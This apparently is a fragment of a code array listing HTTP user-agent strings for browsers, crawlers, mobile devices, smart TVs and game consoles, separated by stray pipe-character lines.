"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
|
||||
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.97 Safari/537.22 Perk/3.3.0.0",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
|
||||
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
|
||||
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0",
|
||||
"MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
|
||||
"Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01",
|
||||
"Gigabot/3.0 (http://www.gigablast.com/spider.html)",
|
||||
"LG-BDP Linux/2.6.35 UPnP/1.0 DLNADOC/1.50 LGE_DLNA_SDK/1.5.0",
|
||||
"Mozilla/5.0 (SmartHub; SMART-TV; U; Linux/SmartTV) AppleWebKit/531.2+ (KHTML, like Gecko) WebBrowser/1.0 SmartTV Safari/531.2+",
|
||||
"Mozilla/5.0 (SMART-TV; X11; Linux i686) AppleWebKit/535.20+ (KHTML, like Gecko) Version/5.0 Safari/535.20+",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36",
|
||||
"Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00",
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)",
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)",
|
||||
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
|
||||
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
|
||||
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
||||
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
|
||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
|
||||
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10",
|
||||
"Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.5.24 Version/10.52",
|
||||
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36",
|
||||
"Opera/8.5 (X11; i686 Linux; U; ru, en_US)",
|
||||
"SexShop.Sg/Nutch-1.1 (www.SexShop.Sg; crawler@SexShop.Sg)",
|
||||
"Rome Client (http://tinyurl.com/64t5n) Ver: 0.9",
|
||||
"Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.13918/19.752; U; ru) Presto/2.6.25",
|
||||
"Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.5.22 Version/10.50",
|
||||
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.24 Version/10.53 MM3-WebAssistant",
|
||||
"C4PC UserAgent/0.7",
|
||||
"Googlebot 1.01.003",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0","Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5",
|
||||
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:24.0) Gecko/20100101 Firefox/24.0",
|
||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)",
|
||||
"Mozilla/5.0 (iPad; U; CPU OS 5_1 like Mac OS X) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 UCBrowser/3.4.3.532",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.10) Gecko/20050716 Thunderbird/1.0.6",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7pre) Gecko/20100925 Firefox/4.0b7pre",
|
||||
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5pre) Gecko/2008032619 Linpus/3.0-0.49.3.0b5pre.lp Minefield/3.0b5pre",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.3a1pre) Gecko/20100128 Minefield/3.7a1pre",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a9pre) Gecko/2007100205 Minefield/3.0a9pre",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9a4pre) Gecko/20070402 Minefield/3.0a4pre",
|
||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041103 Firefox/1.0RC2",
|
||||
"Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0",
|
||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0",
|
||||
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101230 Mandriva Linux/1.9.2.13-0.2mdv2010.2 (2010.2) Firefox/3.6.13",
|
||||
"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
|
||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.27 Safari/536.11",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; AskTbCFTP2V5/5.14.1.20007)", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0",
|
||||
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.3",
|
||||
"Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile",
|
||||
"Mozilla/5.0 (iPad; CPU OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1",
|
||||
"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LPB23.13-58) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1; 360Spider(compatible; Ha",
|
||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60",
|
||||
"Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.8+ (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3",
|
||||
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25",
|
||||
"Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)",
|
||||
"Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)",
|
||||
"Mozilla/5.0 (Admin Catalog; Windows NT 5.1; infobot.4942@yahoo.com)",
|
||||
"HuaweiSymantecSpider/1.0+DSE-support@huaweisymantec.com+(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR ; http://www.huaweisymantec.com/en/IRL/spider)",
|
||||
"Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",
|
||||
"Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=9422214874901413839)",
|
||||
"Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)",
|
||||
"Mozilla/5.0 (Linux; Android 4.2.2; AFTB Build/JDQ39) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.173 Mobile Safari/537.22",
|
||||
"Mozilla/5.0 (PLAYSTATION 3 4.66) AppleWebKit/531.22.8 (KHTML, like Gecko)",
|
||||
"Wget/1.12 (linux-gnu)",
|
||||
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
|
||||
"Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US",
|
||||
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
|
||||
"Mozilla/4.0 (compatible; Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729); Windows NT 5.1; Trident/4.0)",
|
||||
"Mozilla/4.0 (compatible; Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727); Windows NT 5.1; Trident/4.0; Maxthon; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Acoo Browser; InfoPath.2; .NET CLR 2.0.50727; Alexa Toolbar)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Acoo Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727; Media Center PC 3.0; InfoPath.2)",
|
||||
"Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; HbTools 4.7.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1; HbTools 4.8.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; .NET CLR 1.1.4322; HbTools 4.7.1)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; FunWebProducts; (R1 1.5); HbTools 4.7.7)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; FunWebProducts)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.0)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)",
|
||||
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)",
|
||||
"Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
|
||||
"Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
||||
